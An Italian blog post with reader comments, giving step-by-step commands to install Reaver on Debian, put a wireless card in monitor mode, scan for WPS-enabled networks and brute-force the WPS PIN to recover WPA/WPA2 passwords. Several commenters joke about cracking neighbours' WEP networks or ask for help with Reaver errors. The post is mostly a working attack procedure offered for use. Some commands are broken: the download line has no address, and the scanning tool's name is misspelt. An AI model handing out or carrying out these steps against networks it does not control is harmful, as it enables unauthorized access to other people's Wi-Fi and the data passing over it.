Reaver WPS su Debian e cracking password WPA/WPA2 in meno di 12 ore

 

 

 

Reaver WPS riesce con un attaco brute force a decifrare la password wpa/wpa2 della nostra rete, in determinate condizioni. Prima di tutto il WPS o Wi-Fi Protected Setup è diffuso nei router domestici, in genere lo si trova sotto la voce wifi-protezione. La vulnerabilità si nasconde prorpio in questo standard, in quanto, se si utilizza la modalità di inserimento pin al posto del push button, questa apre una falla. Praticamente bombardando il router di  pacchetti, questo restituisce molte informazioni utili al cracking. Comunque in rete si trovano spiegazioni più esaustive e dettagliate. Come prima cosa bisogna installare aircrack-ng, e compilarselo, dato che non è più presente nei repository ufficiali, oppure prelevarlo dal mio repository. Per avere quindi reaver su Debian:

 

$ sudo apt-get install libpcap0.8-dev libsqlite3-dev

$ wget 

$ tar -xvf reaver-1.3.tar.gz

$ cd reaver-1.3/src/

$ ./configure

$ make

$ sudo make install

 

mettere in monitor mode la scheda:

 

# airmon-ng start wlan0

 

il comando sopra creerà mon0 in monitor mode

 

Interface    Chipset        Driver

wlan0        Ralink 2561 PCI    rt61pci – [phy0]
                (monitor mode enabled on mon0
)

 

scanning per rilevare reti wpa:

 

# walsh -i mon0 --ignore-fcs

 

attacco:

 

# reaver -i mon0 -b 00:11:22:33:44:55 --dh-small

 

per altri comandi leggere la documentazione all'interno del pacchetto.

 

enjoy 😉

Post simili (quasi):

11 pensieri riguardo “Reaver WPS su Debian e cracking password WPA/WPA2 in meno di 12 ore”

  1. Unknown Unknown Unknown Unknown

    Diavolo tentatore ho scoperto da mesi una rete protetta da chiave WEP e ora tu mi servi su un piatto d’argento un piccola procedura per chiavi WPA, questo è un invito al brute forcing LOL

  2. Unknown Unknown Unknown Unknown

    @picchiopc
    spero che con la chiave wep, tu non ci abbia messo più di 5 minuti,
    altrimenti sarai bocciato 🙂 Comunque chi si trova nel caso sopra è ad
    alto rischio.

  3. Unknown Unknown Unknown Unknown

    stamattina ho fatto una passeggiata con Wifi Analyzer attivato sull’iphone,
    e mi sono reso conto che quasi un/terzo delle cifrature sono in WEP….robe da matti 🙂

  4. Unknown Unknown Unknown Unknown

    Fortunatamente dalle mie parti le chiavi WEP sono poco usate (forse perché le diffusione nella zona di router wifi è abbastanza recente) ed esempio nel mio quartiere sono pochissime meno di 10 se dovessimo contarle. Il resto è tutto WPA.

    PS: Ma che dici io non ho mai provato a sfondare quella WEP, diciamo che la tengo d’occhio in caso di assenza della rete casalinga xD

  5. Unknown Unknown Unknown Unknown

    Visto che siete due provetti cracker di WI-FI 😉 mi dicevano che aggiungere come protezione il filtro per del mac address non serve a nulla… Ovviamente nella mia beata ignoranza ci sono rimasto malissimo (vabbé che con una password di 55 caratteri dovrei starmene tranquillo…); confermate?
    Ciao 🙂

  6. Unknown Unknown Unknown Unknown

    @Fabio
    partendo dal fatto che la migliore protezione esistente è quella di spegnere
    il wifi quando non ti serve :), diciamo che puoi stare tranquillo, specialmente
    se hai messo anche “(!?^ì*$$%” 🙂 La vulnerabilità sopra la si ha con il wps
    abilitato con il pin fino ad 8 cifre.

  7. Unknown Unknown Unknown Unknown

    @fabio diciamo che aver messo una password non ha nulla a che vedere col wps.
    e diciamo che molti router ultimo modello il wps lo hanno attivato di default. E diciamo che in alcuni non si può disabilitare e diciamo che in alcuni di questi il pin di default è 12345678. e diciamo che anche se hai messo la password più stramba del mondo se sei tanto sfigato da avere uno di questi router reaver te la cracca in 10 secondi.

  8. Unknown Unknown Unknown Unknown

    ciao ma qualcuno ha mai provato con le reti alice?

  9. Unknown Unknown Unknown Unknown

    Non sempre una wep richiede 5 minuti qualche volta meno ,qualche vola di piu ,dipende…….

  10. Unknown Unknown Unknown Unknown

    ciao a tutti!
    io sto provando ad utilizzare reaver ,ma ottengo sempre l’errore
    warning receive timeout occurred
    poi
    wps transaction failed (code 0x02)
    e comincia a scrivere
    reaver receive identity request
    sending identity response
    dopo una pagina così ricomincia da capo .
    se spengo e riaccendo il router reaver riprende a funzionare correttamente per un po’ poi ricomincia con lo stesso problema. qualcuno sa aiutarmi?

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *